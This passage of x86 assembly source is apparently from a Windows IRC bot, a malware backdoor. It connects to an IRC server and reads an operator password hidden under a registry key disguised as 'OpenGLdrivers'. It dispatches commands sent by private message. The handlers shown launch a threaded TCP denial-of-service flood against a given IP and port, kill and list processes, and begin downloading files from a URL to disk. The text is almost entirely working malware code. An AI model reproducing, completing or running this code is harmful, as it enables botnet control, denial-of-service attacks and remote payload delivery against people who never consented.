bot_log_handle dd 0
pop edi
stosd
ENDIF ; IRC_LOG
mov eax, 200h
call malloc
call $+5+4
irc_recv_buffer dd 0 ; irc buffer
pop edi
stosd
connect_to_irc:
call setup_registry
jecxz bot_end
push (socket_handle X).dword ptr 0
callb closesocket
call connect_to_irc_server
jecxz bot_end
call login_to_irc
jc connect_to_irc
jecxz bot_end
call join_channel
jecxz bot_end
__il: call read_line
jecxz bot_end
call parse_line
jecxz __il
bot_end:
;@SEH_RemoveFrame
IFDEF IRC_LOG
push (bot_log_handle X).dword ptr 0
callb CloseHandle
ENDIF ; IRC_LOG
push (socket_handle X).dword ptr 0
callb closesocket
callb WSACleanup
push 0
callb ExitThread
setup_registry: mov eax, 128
call malloc
xchg eax, ebx
x_push eax, Software\Microsoft\Windows\CurrentVersion\OpenGLdrivers~
mov ecx, esp
push _xsize
pop edi
x_push eax, Default~
mov eax, esp
add edi, _xsize
@pushvar <dd 128>
push ebx
@pushvar <dd REG_SZ>
push eax
push ecx
push HKEY_LOCAL_MACHINE
callb SHGetValueA
lea esp, [esp+edi]
xchg eax, ecx
jecxz __convert
mov ecx, bot_password X
call save_hash
jmp __err
__convert: push ebx
callb atoi
pop edx
xchg eax, ecx
jecxz __err
mov bot_password X, ecx
__err: xchg eax, ebx
call free
@retecx1
; ---------------------------------------------------------------------------
; analyzes given commands and calls corresponding subroutines
; i: automatically set after call to read_line
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
parse_line: xchg eax, esi ; save ptr to the end of line
push ecx
mov esi, irc_recv_buffer X
mov edx, esi
x_push ecx, :irc. ; discard irc.*
mov edi, esp
push 4
pop ecx
cld
repz cmpsb
x_pop
pop ecx
jz quit_oky
mov esi, edx
lodsd
cmp eax, "GNIP"
jz pong
mov esi, edx
@endspc
cmp [esi], "VIRP"
jnz quit_oky
cmp [esi+4], " GSM"
jnz quit_oky
lodsd ; skip PRIVMSG + space
lodsd
push esi
lea esi, irc_nick X
mov ebx, esi
@endcr
sub esi, ebx
dec esi
mov ecx, esi
pop esi
push ecx esi ecx ebx
push NORM_IGNORECASE
push LOCALE_SYSTEM_DEFAULT
callb CompareStringA
sub al, 2
jz __private_msg
__chan_msg: jmp quit_oky
__private_msg: mov esi, irc_recv_buffer X
mov edx, esi
@usklicnik
sub esi, edx
sub esi, 2 ; : & !
mov ecx, esi ; nick length
push ecx ; needed 4 l8r
mov esi, edx
inc esi
call $+5+10
irc_cmd_nick db 10 dup(0)
pop edi
cld
rep movsb
xor al, al
stosb ; +NULL
pop ecx ; length of the active nick
call __s
priv_msg_curr_user db "PRIVMSG "
db 200 dup(0)
__s: pop edi ; construct default PRIVMSG for current user
scasd ; edi+=8
scasd
lea esi, irc_cmd_nick X
cld
rep movsb
mov ax, ": " ; after this comes the msg
stosw
mov esi, edx
@endspc
lodsd ; esi+=8
lodsd
@dvotocka
mov edi, esi ; save ptr to the command
mov ebx, edi ; ebx is used for param. transfer
lea esi, cmd_dispatch_table X
xor ecx, ecx
__1: add esi, ecx
mov edi, ebx
lodsb
movzx ecx, al
jecxz __unknown_cmd
cld
repz cmpsb
lodsd
jnz __1
add eax, ebp
sub eax, offset bdelta ; prior to calling, relocate hard-coded subroutine offset
call eax
jecxz bad_quit
__unknown_cmd: jmp quit_oky
pong: mov byte ptr [esi-4+1],'O'
mov esi, edx
call irc_send
jecxz bad_quit
jmp quit_oky
bad_quit: push 1
pop ecx
jmp $+2+2
quit_oky: xor ecx, ecx
ret
bot_cmd_stopdos: call check_logged_in
jnc err_not_logged_in
and (DOS_flag X).byte ptr 0, 0
@retecx1
; ---------------------------------------------------------------------------
; starts DOS attack on the target
; format: !dos <IP> <port> <packet_size> <interval_in_ms_between_packets>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_dos: call check_logged_in
jnc err_not_logged_in
movzx ecx, (DOS_flag X).byte ptr 0
jecxz __okie
x_push eax, <DOS attack allready in progress.>
push esp
push 32
pop ecx
call send_privmsg
x_pop
jmp bot_cmd_dos_end
__okie: lea esi, [ebx+4+1]
push esi
xor edx, edx
__spc: lodsb
cmp al, ' '
jnz __skip
inc edx
__skip: cmp al, CR
jnz __spc
pop esi
sub edx, 3
jnz err_cmd_syntax
inc (DOS_flag X).byte ptr 0
call patchspc
push esi
callb inet_addr
mov DOS_IP X, eax
@endsz
call patchspc
call ascii2num
mov DOS_port X, eax
call patchspc
call ascii2num
mov DOS_packet_size X, eax
call patchspc
call ascii2num
mov DOS_interval X, eax
xor eax, eax
push eax
push esp
push eax
push eax ; thread param
lea ebx, bot_DOS_thread X
push ebx
push 2000h
push eax
callb CreateThread
pop ecx
push eax
callb CloseHandle
bot_cmd_dos_end: @retecx1
bot_DOS_thread proc pascal
@SEH_SetupFrame <jmp __DOS_xception>
call $+5
dosdlta: pop ebp
_DOS equ <-dosdlta[ebp]>
__cycle: xor ebx, ebx
push ebx
push SOCK_STREAM
push AF_INET
call _socket _DOS
mov esi, eax
inc eax
jz __end
push ebx ; sin_zero[8]
push ebx
db 068h
DOS_IP dd ? ; sin_addr
db 068h
DOS_port dd ?
call _htons _DOS
shl eax, 16
add al, AF_INET
push eax
mov ecx, esp
push type sockaddr_in
push ecx
push esi
call _connect _DOS
add esp, 16
inc eax
jz __end_1
db 0b8h
DOS_packet_size dd ?
call malloc
xchg eax, ecx
jecxz __end_1
push ebx
push (DOS_packet_size _DOS).dword ptr 0
push ecx
push esi
call _send _DOS
inc eax
jz __end_1
db 068h
DOS_interval dd ?
call _Sleep _DOS
push esi
call _closesocket _DOS
movzx ecx, (DOS_flag _DOS).byte ptr 0
jecxnz __cycle
__end_1: push esi
call _closesocket _DOS
__end: dec (DOS_flag _DOS).byte ptr 0
__DOS_xception: @SEH_RemoveFrame
push 0
call _ExitThread _DOS
DOS_flag db 0
bot_DOS_thread endp
; ---------------------------------------------------------------------------
; lists currently logged in ops
; format: !opers
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_opers: call check_logged_in
jnc err_not_logged_in
mov eax, 512
call malloc
xchg eax, edi
mov ebx, edi
x_stosd <There are currently >
mov eax, operators X
push eax
call num2ascii
add edi, eax
x_stosd < ops logged in: >
pop ecx
lea esi, operators X
lodsd
mov edx, esi
__cycle: mov esi, edx
__copy: lodsb
stosb
test al, al
jnz __copy
dec edi
mov ax, ' ,'
stosw
add edx, size operator
loop __cycle
dec edi
dec edi
mov al, '.'
stosb
mov ax, CRLF_HEX
stosw
mov ecx, edi
sub ecx, ebx
push ebx
call send_privmsg
push ecx
mov eax, ebx
call free
pop ecx
jecxz $+2+3
push 1
pop ecx
ret
; ---------------------------------------------------------------------------
; kills a process having specified PID
; format: !kill <PID>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_kill: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+5+1]
call patchcr
call ascii2num
push eax
push 0
push PROCESS_TERMINATE
callb OpenProcess
push 0
push eax
callb TerminateProcess
@retecx1
; ---------------------------------------------------------------------------
; lists active processes on the system. displays PATH & PID
; format: !procs
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_procs: call check_logged_in
jnc err_not_logged_in
xor eax, eax
push eax
push esp
push eax
push eax ; thread param
lea ebx, bot_procs_thread X
push ebx
push 2000h
push eax
callb CreateThread
pop ecx
push eax
callb CloseHandle
@retecx1
bot_procs_thread proc pascal
local p_handle
local p_entry:PROCESSENTRY32
local msg
@SEH_SetupFrame <jmp __procs_exception>
call $+5
procsdlta: pop ebx
_PD equ <-procsdlta[ebx]>
mov eax, 512
call malloc
xchg eax, edi
mov msg, edi
x_stosd <PRIVMSG >
lea esi, irc_cmd_nick _PD
push esi
@endsz
sub esi, [esp]
lea ecx, [esi-1]
pop esi
cld
rep movsb
mov ax, ": "
stosw
push edi
push 0
push TH32CS_SNAPPROCESS
call _CreateToolhelp32Snapshot _PD
inc eax
jz __end
dec eax
mov p_handle, eax
lea ecx, p_entry
mov [ecx.dwSize], size PROCESSENTRY32
push ecx
push eax
call _Process32First _PD
test eax, eax
jz __end_1
__cycle: pop edi
push edi
lea esi, p_entry.szExeFile
__copy: lodsb
stosb
test al, al
jnz __copy
dec edi
x_stosd < - PID: >
mov eax, p_entry.th32ProcessID
call num2ascii
add edi, eax
mov ax, CRLF_HEX
stosw
mov ecx, edi
sub ecx, msg
IFDEF IRC_LOG
pusha
xor eax, eax
push eax esp ecx msg
push (bot_log_handle _PD).dword ptr 0
call _WriteFile _PD
popa
ENDIF ; IRC_LOG
pusha
push 0
push ecx
push msg
push (socket_handle _PD).dword ptr 0
call _send _PD
mov [esp.Pushad_ecx], eax
popa
jecxz __end_1
inc ecx
jecxz __end_1
mov esi, edx
push 1500
call _Sleep _PD
lea eax, p_entry
push eax
push p_handle
call _Process32Next _PD
test eax, eax
jnz __cycle
pop eax
__end_1: push p_handle
call _CloseHandle _PD
__end: mov eax, msg
call free
leave
__procs_exception: @SEH_RemoveFrame
push 0
call _ExitThread _PD
bot_procs_thread endp
; ---------------------------------------------------------------------------
; downloads a file from http|ftp resource
; format: !download <url> <file_name_to_save_to>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_download: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+9+1]
xor edx, edx
push esi
__spc: lodsb
cmp al, ' '
jz __skip
inc edx
__skip: cmp al, CR
jnz __spc
dec edx
pop esi
jnz err_cmd_syntax
call patchspc
mov eax, 516
call malloc
xchg eax, edi
mov ebx, edi
__copy: lodsb
stosb
test al, al
jnz __copy
call patchcr
xor eax, eax
push eax
push eax
push CREATE_ALWAYS
push eax
push FILE_SHARE_READ
push GENERIC_WRITE
push esi
callb CreateFileA
inc eax
jz __err
dec eax
stosd
xor eax, eax
push eax
push esp
push eax
push ebx ; thread param
lea ebx, bot_download_thread X